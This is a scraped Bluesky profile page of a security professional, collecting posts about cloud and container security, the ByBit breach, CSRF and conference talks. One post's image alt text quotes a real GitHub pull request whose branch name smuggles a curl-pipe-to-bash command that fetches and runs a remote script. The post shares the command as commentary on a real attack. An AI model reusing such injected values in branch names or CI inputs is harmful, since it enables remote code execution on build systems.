emil's Avatar

emil

@emilpls.bsky.social

Code/Cloud/Security

42 Followers  |  76 Following  |  6 Posts  |  Joined: 20.09.2023  |  1.6077

Latest posts by emilpls.bsky.social on Bluesky


awesome HTML slides with live interaction!

25.05.2025 10:43 β€” πŸ‘ 2    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Sweet!

18.03.2025 17:41 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

All military aid from the U.S. to Ukraine from 2014-2024 has cost the U.S. tax payer $19.94 per person per year.

In return they got to destroy Russia’s entire Soviet equipment inheritance and still complain it is a bad deal

09.03.2025 01:21 β€” πŸ‘ 1656    πŸ” 463    πŸ’¬ 29    πŸ“Œ 33
Preview
Safe.eth on X: "Investigation Updates and Community Call to Action" / X Investigation Updates and Community Call to Action

New details on the ByBit/Safe{Wallet} breach, and uhhh wow, some really silly blunders on the DPRK side. They still succeeded which is the most upsetting part of all of this. Let's bully some threat actor tradecraft! A🧡
x.com/safe/status/...

06.03.2025 17:21 β€” πŸ‘ 23    πŸ” 12    πŸ’¬ 1    πŸ“Œ 2

quick maths 60/4=15 hours per day, easy πŸ₯΅

02.03.2025 05:59 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Very interesting work!

02.03.2025 05:54 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Reminder that the Call for Presentations for Sikkerhetsfestivalen (The Security Festival) is open. OWASP Oslo is hosting an AppSec track. Scroll down the page for English version:

sikkerhetsfestivalen.no/alle-nyheter...

10.02.2025 11:20 β€” πŸ‘ 1    πŸ” 2    πŸ’¬ 0    πŸ“Œ 0

Seems like there's a bit of confusion around the recent @Semgrep licence change and the @opengrep fork and I think there are two key points to highlight.

1/10

24.01.2025 11:04 β€” πŸ‘ 6    πŸ” 3    πŸ’¬ 1    πŸ“Œ 0

yes, that one almost reads as it is a AI generated point. lol

07.01.2025 21:13 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0
Post image

I've spent dozens of hours reading State of Cloud Security reports

You know, the ones that use data from their CSPM product

And I've realized the findings substantially reflect how well that tool helps customers secure their clouds

I wrote up some examples, both good and bad (πŸ”— in 🧡)

18.12.2024 16:50 β€” πŸ‘ 8    πŸ” 4    πŸ’¬ 1    πŸ“Œ 0

Slides for the @bsideslondon.bsky.social container security workshop presented with @smarticu5.bsky.social and @marionmccune.bsky.social are here blog.iainsmart.co.uk/talks/BSides...

15.12.2024 10:48 β€” πŸ‘ 22    πŸ” 8    πŸ’¬ 1    πŸ“Œ 0
Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

absolutely incredible attack vector

06.12.2024 03:27 β€” πŸ‘ 950    πŸ” 258    πŸ’¬ 17    πŸ“Œ 53

any idea why CSRF is +5 since last year? I rarely see CSRF reports these days.

03.12.2024 20:26 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Modern solutions against cross-site attacks Modern solutions against cross-site attacks

Modern solutions against cross-site attacks (frederikbraun.de/modern-solut...): An article about cross-site leak attacks and browser-based defenses. You will also learn why web security best practices is always opt-in and finally how YOU can get increased security controls.

27.11.2024 07:50 β€” πŸ‘ 34    πŸ” 19    πŸ’¬ 0    πŸ“Œ 1

This is a fascinating case study of real operational use of cryptography by non-technical people, of OPSEC, of anonymity tech, and of web security.

cw: drugs

02.12.2024 11:03 β€” πŸ‘ 67    πŸ” 16    πŸ’¬ 0    πŸ“Œ 0
Preview
How Tailscale's infrastructure team stays small Tailscale’s secure, simplified networking solution helps DevOps teams eliminate infrastructure headaches. Learn how our infra team of just three engineers uses Tailscale to handle networking, secrets,...

tailscale.com/blog/infra-t...

Awesome article by @tailscale.com team. It shows the good stuff that can happen if you take product design security and scalability from the get go. Kudos to the team, and I think at this point I should call myself a fanboy xD

I didn't know about setec. That's awesome

02.12.2024 13:07 β€” πŸ‘ 5    πŸ” 3    πŸ’¬ 0    πŸ“Œ 0
Preview
Awseye - See Inside AWS Accounts Awseye tracks publicly accessible AWS data to help identify and secure known and exposed AWS resources. Empowering defenders with open-source intelligence.

The self described β€œShodan of AWS” is now live! This is an amazing project from Daniel Grzelak that helps democratize cloud resource enumeration for the masses. Very excited about this!
awseye.com

26.11.2024 02:31 β€” πŸ‘ 71    πŸ” 34    πŸ’¬ 2    πŸ“Œ 3
Posts by Category This site hosts a list of talks from various conferences on the topic of Cloud Native security.

If you're looking for the security talks from Kubecon NA 2024, I've added the abstracts and Youtube embeds to talks.container-security.site/categories/#... .

There's also talks going back to 2016 in case you really want to watch a lot of container security videos!

18.11.2024 19:27 β€” πŸ‘ 35    πŸ” 10    πŸ’¬ 1    πŸ“Œ 0

@emilpls is following 20 prominent accounts